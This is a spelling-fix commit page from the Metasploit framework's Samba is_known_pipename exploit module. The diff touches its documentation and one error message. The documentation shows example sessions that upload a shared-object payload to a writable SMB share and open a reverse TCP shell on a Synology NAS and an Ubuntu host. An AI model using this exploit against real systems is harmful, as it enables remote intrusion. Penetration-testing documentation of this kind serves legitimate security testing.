Skip to content

Commit 28fb5cc

Browse files
author
Brent Cook
committed
spelling
1 parent e31e3fc commit 28fb5cc

File tree

2 files changed

+7
-7
lines changed

2 files changed

+7
-7
lines changed

documentation/modules/exploit/linux/samba/is_known_pipename.md

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -58,12 +58,12 @@ echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } fo
5858
## Options
5959

6060
**SMB_SHARE_NAME**
61-
61+
6262
The name of the SMB share containing a writeable directory. Shares are automatically scanned for, and if this
6363
variable is non-blank, it will be preferred.
6464

6565
**SMB_SHARE_BASE**
66-
66+
6767
The remote filesystem path correlating with the SMB share name. This value is preferred, but other values are
6868
brute forced including:
6969

@@ -79,7 +79,7 @@ echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } fo
7979
10. /tmp/home/home/shared
8080

8181
**SMB_FOLDER**
82-
82+
8383
The directory to use within the writeable SMB share. Writable directories are automatically scanned for, and if this
8484
variable is non-blank, it will be preferred.
8585

@@ -90,7 +90,7 @@ echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } fo
9090
```
9191
msf exploit(is_known_pipename) > exploit
9292
93-
[*] Started reverse TCP handler on 1.2.3.117:4444
93+
[*] Started reverse TCP handler on 1.2.3.117:4444
9494
[*] 1.2.3.119:445 - Using location \\1.2.3.119\ESX\ for the path
9595
[*] 1.2.3.119:445 - Payload is stored in //1.2.3.119/ESX/ as eePUbtdw.so
9696
[*] 1.2.3.119:445 - Trying location /volume1/eePUbtdw.so...
@@ -107,9 +107,9 @@ Linux synologyNAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Lin
107107
### Ubuntu 16.04
108108

109109
```
110-
msf exploit(is_known_pipename) > exploit
110+
msf exploit(is_known_pipename) > exploit
111111
112-
[*] Started reverse TCP handler on 192.168.0.3:4444
112+
[*] Started reverse TCP handler on 192.168.0.3:4444
113113
[*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path
114114
[*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so
115115
[*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so...

modules/exploits/linux/samba/is_known_pipename.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -208,7 +208,7 @@ def find_writeable_share_path
208208
def find_writeable
209209
find_writeable_share_path
210210
unless @share && @path
211-
print_error("No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")
211+
print_error("No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")
212212
fail_with(Failure::NoTarget, "No matching target")
213213
end
214214
print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")

0 commit comments

Comments
 (0)